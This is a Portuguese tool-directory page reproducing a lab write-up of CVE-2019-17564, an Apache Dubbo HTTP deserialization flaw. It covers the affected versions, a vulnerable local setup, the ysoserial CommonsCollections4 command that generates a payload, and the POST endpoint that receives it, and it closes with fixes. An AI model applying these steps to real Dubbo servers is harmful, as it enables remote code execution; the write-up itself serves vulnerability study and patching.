Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-17564 — CVE-2019-17564:Vulnerabilidade de desserialização do Apache Dubbo | Kitploit
Ferramentas/GitHubGitHub/fairyming/cve-2019-17564
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubfairyming/cve-2019-17564

CVE-2019-17564

CVE-2019-17564:Vulnerabilidade de desserialização do Apache Dubbo

Ver Repositório
851há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-17564: Vulnerabilidade de desserialização do Apache Dubbo

0x00 Introdução

Apache Dubbo é um framework Java RPC de código aberto de alto desempenho e leve, que oferece três capacidades principais: chamada de método remoto orientada a interface, tolerância a falhas inteligente e balanceamento de carga, e registro e descoberta automáticos de serviços.

0x01 Visão geral da vulnerabilidade

 Apache Dubbo suporta vários protocolos, sendo o protocolo Dubbo o recomendado oficialmente. Uma vulnerabilidade de desserialização (CVE-2019-17564) no protocolo HTTP do Apache Dubbo ocorre principalmente porque, quando o Apache Dubbo habilita o protocolo HTTP, o tratamento inadequado do corpo da mensagem leva a uma desserialização insegura. Quando existem gadgets úteis no pacote do projeto, pode resultar em execução remota de código.

0x02 Versões afetadas

2.7.0 <= Apache Dubbo <= 2.7.4.1 2.6.0 <= Apache Dubbo <= 2.6.7 Apache Dubbo = 2.5.x

0x03 Configuração do ambiente

1、Como a inicialização do dubbo depende do zookeeper, primeiro instale o zookeeper

root@kitploit:~
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
# 将conf目录下的zoo_sample.cfg改名为zoo.cfg
mv zoo_sample.cfg zoo.cfg
# 进入bin目录启动zookeeper
./zkServer.sh start

WX20200222-171524@2x.png

2、Obtenha o projeto dubbo do Github e modifique o pom.xml

root@kitploit:~
git clone https://github.com/apache/dubbo-samples
# 进入到dubbo-samples-http目录中,修改pom.xml
vim pom.xml

Altere a versão do dubbo para uma versão vulnerável WX20200222-172028@2x.png Adicione uma dependência, importe um gadgets acionável, aqui importado é commons-collections4-4.0

root@kitploit:~
<dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>

WX20200222-172346@2x.png

3、Construa com mvn, inicie o dubbo

root@kitploit:~
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java

WX20200222-172721@2x.png

0x04 Exploração da vulnerabilidade

payload

root@kitploit:~
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080

paylaod

Aqui use ysoserial para gerar payload

root@kitploit:~
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser

bp envia o pacote WX20200222-173202@2x.png

0x05 Métodos de correção

  1. Desabilite o protocolo HTTP
  2. Atualize para a versão 2.7.5 ou superior, link relacionado: https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5

Links de referência:

https://www.mail-archive.com/[email protected]/msg06225.html

Baixar ferramenta